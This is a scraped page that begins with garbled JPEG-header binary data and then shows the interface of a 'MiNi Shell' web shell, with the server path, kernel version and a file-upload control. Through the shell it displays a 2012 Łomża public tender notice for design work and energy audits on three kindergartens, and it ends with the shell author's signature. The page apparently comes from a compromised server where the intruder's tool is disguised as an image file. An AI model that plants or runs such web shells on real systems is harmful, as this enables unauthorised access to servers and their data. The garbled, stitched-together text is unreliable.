JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120725/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120725/270404-N-2012.html

<p class="kh_header"><b>Łomża: Opracowanie dokumentacji technicznej na modernizację i termomodernizację wraz z audytami energetycznymi budynków -  Przedszkola Publicznego Nr 1  ul. Wyzwolenia 1, Przedszkola Publicznego Nr 4  ul. Spółdzielcza 8 oraz Przedszkola Publicznego Nr  8 ul. Studencka 13 w Łomży.</b><br>
<b>Numer ogłoszenia: 270404 - 2012; data zamieszczenia: 25.07.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Łomża , pl. Stary Rynek 14, 18-400 Łomża, woj. podlaskie, tel. 086 2156711, faks 086 2156706.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://um.lomza.pl/bip/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie dokumentacji technicznej na modernizację i termomodernizację wraz z audytami energetycznymi budynków -  Przedszkola Publicznego Nr 1  ul. Wyzwolenia 1, Przedszkola Publicznego Nr 4  ul. Spółdzielcza 8 oraz Przedszkola Publicznego Nr  8 ul. Studencka 13 w Łomży..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest opracowanie dokumentacji technicznej na modernizację i termomodernizację wraz z audytami energetycznymi budynków  -   Przedszkole Publiczne nr 1  przy ul. Wyzwolenia 1 w Łomży
Dane obiektu:
-	powierzchnia zabudowy:  827,90 m2
-	powierzchnia użytkowa: 1009 m2
-	kubatura: 5698 m3


Zakres prac projektowych obejmuje:
audyt energetyczny wraz z załącznikiem ekologiczno technicznym - zgodnie z wymogami  Programu Narodowego Funduszu Ochrony Środowiska i Gospodarki Wodnej - System Zielonych Inwestycji GIS - Zarządzanie Energią.

1.	Termomodernizacja.

1.	Docieplenie ścian piwnicznych   wraz z wykonaniem hydroizolacji.
2.	Docieplenie ścian zewnętrznych budynku powyżej poziomu terenu.
3.	Docieplenie stropodachu.
4.	Wykonanie drenażu opaskowego wokół budynku  
(występują zawilgocenia ścian fundamentowych)
5.	Modernizacja instalacji centralnego ogrzewania - wymiana rurociągów, grzejników (grzejniki żeliwne z zamontowanymi zaworami termostatycznymi, zamontowane nowe kotły gazowe)
6.	Wykonanie instalacji odgromowej.
7.	Wykonanie wejścia głównego do budynku (nie spełnia wymagań obowiązujących przepisów)
8.	Wykonanie opaski wokół budynku.
9.	Wymiana drzwi zewnętrznych i okien nie spełniających wymagań dotyczących właściwości cieplnych.
10.	Remont pokrycia dachowego wraz z wymianą rynien i rur spustowych, montaż podgrzewanych wpustów, ogrzewanie cieku (dach pogrążalny), remont kominów
11.	Udrożnienie przewodów wentylacji grawitacyjnej.
12.	Montaż nawiewników higrosterowalnych w oknach.



2.	Modernizacja i remont.


1.	Wydzielenie klatki schodowej - z systemem oddymiania zgodnie z obowiązującymi przepisami p.poż
      Zabezpieczenie zejścia do piwnicy zgodnie z przepisami ppoż.
      Wykonanie oświetlenia awaryjmego na drodze ppoż.
2.	Wymiana wewnętrznych instalacji sanitarnych:
	- wymiana instalacja wody zimnej, ciepłej,
	- wymiana instalacji wody p.poż,
	- wymiana instalacji kanalizacji sanitarnej (rury skorodowane, występują 	przecieki, 	  wydzielają się brzydkie zapachy).
3.	Wymiana wewnętrznej instalacji kanalizacji deszczowej (przecieki występujące na ścianach budynku - dach pogrążalny)
4.	Przebudowa kanalizacji sanitarnej zewnętrznej (problemy z odprowadzeniem ścieków z budynku, występuje częste zapychanie się kanalizacji i wybijanie ścieków wewnątrz budynku).
5.	Technologia kuchni (zalecana: SANEPID - nie spełnia wymagań obowiązujących przepisów):
-	modernizacja instalacji wentylacji,
-	modernizacja instalacji elektrycznej,
-	modernizacja instalacji sanitarnej (wydzielenie kanalizacji technologicznej z separatorem tłuszczu),
-	wyposażenie kuchni w urządzenia.
6.	Zagospodarowanie terenu wokół budynku (wiata śmietnikowa, parking - nie spełnia wymagań obowiązujących przepisów)
7.	Remont łazienek.
8.	Likwidacja części i remont pozostałej części tarasu
9.	Częściowa modernizacja instalacji elektrycznej - wymiana opraw oświetleniowych w całym obiekcie, likwidacja rozdzielni elektrycznych żeliwnych i zastąpienie ich szafkami rozdzielczymi. Częściowa wymiana instalacji elektrycznej z uwagi na modernizację technologii kuchni i zaplecza kuchennego.
10.	Roboty budowlane po starej kotłowni (demontaż starej instalacji i prace wykończeniowe pomieszczenia)

II  -   Przedszkole Publiczne nr 4 przy ul. Spółdzielcza 4 w Łomży.

Dane obiektu:
-	powierzchnia zabudowy: 739,80 m2
-	powierzchnia użytkowa: 817,59 m2
-	kubatura:5298,90 m3

Zakres prac projektowych:
audyt energetyczny wraz z załącznikiem ekologiczno technicznym - zgodnie z wymogami Programu Narodowego Funduszu Ochrony Środowiska i Gospodarki Wodnej - System Zielonych Inwestycji GIS - Zarządzanie Energią, 

1. Termomodernizacja.

1.	Docieplenie ścian piwnicznych wraz z wykonaniem hydroizolacji.
2.	Docieplenie ścian zewnętrznych budynku powyżej poziomu terenu.
3.	Docieplenie stropodachu.
4.	Wykonanie drenażu opaskowego wokół budynku (występują zawilgocenia ścian piwnicznych).
5.	Modernizacja instalacji centralnego ogrzewania - wymiana rurociągów, grzejników (grzejniki żeliwne z zamontowanymi zaworami termostatycznymi).
6.	Wykonanie instalacji odgromowej.
7.	Wykonanie opaski wokół budynku.
8.	Wymiana drzwi zewnętrznych i okien nie spełniających wymagań dotyczących właściwości cieplnych.
9.	Remont pokrycia dachowego wraz z wymianą rynien i rur spustowych, remont kominów, włączenie rur spustowych do kanalizacji deszczowej.
10.	Modernizacja oraz udrożnienie przewodów wentylacji grawitacyjnej (niektóre pomieszczenia nie posiadają wentylacji).
11.	Montaż nawiewników higrosterowalnych w oknach.

2. Modernizacja i remont.

1.	Wydzielenie klatki schodowej - z systemem oddymiającym zgodnie z obowiązującymi przepisami p.poż.
Zabezpieczenie zejścia do piwnicy zgodnie z przepisami ppoż
opracowanie dróg ewakuacyjnych z pomieszczeń z oświetleniem awaryjnym.

      2. Wymiana wewnętrznych instalacji sanitarnych:
-	wymiana instalacja wody zimnej, ciepłej,
-	   wymiana instalacji wody p.poż,
-	  wymiana instalacji kanalizacji sanitarnej (rury skorodowane, występują przecieki,  wydzielają się brzydkie zapachy).
 
3.	Przebudowa przyłączy kanalizacji sanitarnej z budynku do pierwszej studzienki zewnętrznej (problemy z odprowadzeniem ścieków z budynku, występuje częste zapychanie się kanalizacji i wybijanie ścieków wewnątrz budynku).
4.	Technologia kuchni:
-	modernizacja instalacji wentylacji (istniejąca wentylacja niesprawna - do demontażu),
- modernizacja instalacji elektrycznej (wymiana opraw, dostosowanie do nowego wyposażenia),
- modernizacja instalacji sanitarnej (wydzielenie kanalizacji technologicznej z separatorem tłuszczu),
- wyposażenie kuchni w urządzenia
5.	Zagospodarowanie terenu wokół budynku (wiata śmietnikowa).
6.	Remont łazienek.
7.	Częściowa modernizacja instalacji elektrycznej - wymiana opraw oświetleniowych w pionie kuchennym, likwidacja rozdzielni elektrycznych żeliwnych i zastąpienie ich szafkami rozdzielczymi. Częściowa wymiana instalacji elektrycznej z uwagi na modernizację technologii kuchni i zaplecza kuchennego.

III  -   Przedszkole Publiczne nr 8 przy ul. Studenckiej 13 w Łomży.

Dane obiektu:
-	powierzchnia zabudowy: 732 m2
-	powierzchnia użytkowa: 1032 m.2
-	kubatura: 3794,40 m.3

Zakres prac projektowych:
audyt energetyczny wraz z załącznikiem ekologiczno technicznym - zgodnie z wymogami Programu Narodowego Funduszu Ochrony Środowiska i Gospodarki Wodnej - System Zielonych Inwestycji GIS - Zarządzanie Energią,

1. Termomodernizacja.

1.	Docieplenie ścian fundamentowych poniżej poziomu terenu wraz z wykonaniem hydroizolacji.
2.	Docieplenie ścian zewnętrznych budynku powyżej poziomu terenu.
3.	Docieplenie dachu.
4.	Wykonanie ocieplenia podłogi na gruncie oraz izolacji poziomej wewnątrz budynku (występują zawilgocenia ścian).
5.	Modernizacja instalacji centralnego ogrzewania - wymiana rurociągów, grzejników (grzejniki żeliwne, część instalacji jest zmodernizowana).
6.	Wykonanie instalacji odgromowej.
7.	Wykonanie wejścia głównego do budynku (nie spełnia wymagań obowiązujących przepisów).
8.	Wykonanie opaski wokół budynku.
9.	Wymiana drzwi zewnętrznych i okien nie spełniających wymagań dotyczących właściwości cieplnych.
10.	 Modernizacja wentylacji grawitacyjnej (istniejąca wentylacja niesprawna, występują brzydkie zapachy).
11.	 Montaż nawiewników higrosterowalnych w oknach.
12.	 Remont pokrycia dachowego wraz z wymianą rynien i rur spustowych, montaż podgrzewanych wpustów, remont kominów.

2. Modernizacja i remont.

1.	Modernizacja klatek schodowych - z systemem oddymiania zgodnie z obowiązującymi przepisami p.poż.
Oświetlenie awaryjne na drogach ewakuacyjnych zgodnie z przepisami ppoż
Podwóne wyjścia ppoż z pomieszczeń parteru

      2. Wymiana wewnętrznych instalacji sanitarnych:
- wymiana instalacja wody zimnej, ciepłej,
- wymiana instalacji wody p.poż,
- wymiana instalacji kanalizacji sanitarnej (rury skorodowane, występują przecieki, wydzielają się brzydkie zapachy).
3.	Przebudowa kanalizacji sanitarnej zewnętrznej (problemy z odprowadzeniem ścieków z budynku, występuje częste zapychanie się kanalizacji i wybijanie ścieków wewnątrz budynku).
4.	Technologia kuchni:
-	modernizacja instalacji wentylacji,
-	  modernizacja instalacji elektrycznej,
-	modernizacja instalacji sanitarnej (wydzielenie kanalizacji technologicznej z separatorem tłuszczu),
-	wyposażenie kuchni w urządzenia.

5.	Remont łazienek..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.22.10.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 6.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy nie podlegają wykluczeniu z postępowania na podstawie art. 24 ust. 1 i 2 ustawy i spełniają nw. warunki  określone zgodnie z wymogami art. 22 ust. 1 ustawy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże się należytym wykonaniem minimum 3 prac projektowych w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie - odpowiadających swoim rodzajem opracowaniom projektowym stanowiącym przedmiot zamówienia 
Zamawiający za pracę projektową uważa opracowanie pełnobranżowej (budowlana, sanitarna, elektryczna) dokumentacji na termomodernizację, modernizację, przebudowę obiektu szkolnego, przedszkolnego, obiektu zbiorowego zamieszkania  o kubaturze nie mniejszej niż 5000 m3.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże, że dysponuje co najmniej po jednej osobie każdej branży (budowlana, sanitarna, elektryczna), które posiadają wymagane uprawnienia do projektowania bez ograniczeń, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca:
-	posiada środki finansowe lub zdolnością kredytową na kwotę łączną nie mniejszą niż  90 000,00 zł .
-	Jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności , związanej z przedmiotem zamówienia na wartość co najmniej  100 000,00 zł, tj. kwotę odszkodowania, jaką gwarantuje ubezpieczyciel ( tj. po uwzgędnieniu ewentualnej franszyzy redukcyjnej).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.lomza.pl/bip<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Łomży, Wydział Oswiaty  
18-400 Łomża ul. Farna 1 pokój nr 2.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.08.2012 godzina 11:00, miejsce: Urząd Miejski w Łomży, ul. Stary Rynek 14, 18-400 Łomża
pokój nr 102 (sekretariat  Zastępców Prezydenta Miasta ) I piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com